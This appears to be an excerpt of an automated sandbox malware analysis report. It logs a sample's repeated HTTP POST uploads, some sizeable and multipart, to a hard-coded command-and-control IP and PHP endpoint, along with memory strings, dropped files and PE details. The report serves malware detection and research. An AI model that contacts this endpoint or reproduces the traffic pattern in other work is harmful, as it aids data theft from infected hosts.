                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----vb00ndIHgHvNoJ7fSqVxvDUiUocs3TKQONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 114202Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1936Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1060Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 193.3.168.50Content-Length: 1056Expect: 100-continueConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 193.3.168.50 | Content-Length: 1056 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 193.3.168.50 | Content-Length: 1924 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 193.3.168.50 | Content-Length: 1908 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknownTCP traffic detected without corresponding DNS query: 193.3.168.50
                                  Source: unknown HTTP traffic detected: POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 193.3.168.50 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000370E000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003790000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003D00000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.00000000036DD000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003837000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.3.168.50
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData
                                  Source: svchost.exe, 00000012.00000002.2910150411.00000181EF800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: edb.log.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                  Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6C8000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF6FD000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: qmgr.db.18.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                  Source: powershell.exe, 00000008.00000002.1829367283.000001D7001C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                  Source: powershell.exe, 00000008.00000002.1831461508.000001D700585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.AppV.
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                  Source: edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                  Source: powershell.exe, 00000008.00000002.1834436615.000001D768189000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: svchost.exe, 00000012.00000003.1886588662.00000181EF772000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                  Source: edb.log.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://www.ecosia.org/newtab/
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe Window created: window name: CLIPBRDWNDCLASS

                                  System Summary

                                  Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E36FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
                                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\GYwcCMoE.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 00E4EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 00E4F5F0 appears 31 times
                                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 00E4EC50 appears 56 times
                                  Source: QRPSxHgy.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: ZlAIxOci.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: aEtIhTbg.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: YuXIhBvf.log.4.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: file.exe, 00000000.00000003.1647603635.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs file.exe
                                  Source: file.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs file.exe
                                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: chainportruntimeCrtMonitor.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: kahKUDRlEYHfKIalWlM.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: QRPSxHgy.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: HnGdNOQQ.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: ZlAIxOci.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: vCAeICGo.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: aEtIhTbg.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: YuXIhBvf.log.4.dr, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.32e89a8.13.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 4.2.chainportruntimeCrtMonitor.exe.32c8378.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
